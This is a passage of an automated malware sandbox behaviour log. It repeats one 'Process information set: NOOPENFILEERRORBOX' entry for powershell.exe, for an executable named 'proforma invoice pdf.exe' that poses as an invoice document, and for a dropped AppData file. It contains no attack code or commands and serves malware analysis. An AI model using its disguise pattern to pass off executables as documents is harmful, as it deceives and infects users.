Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
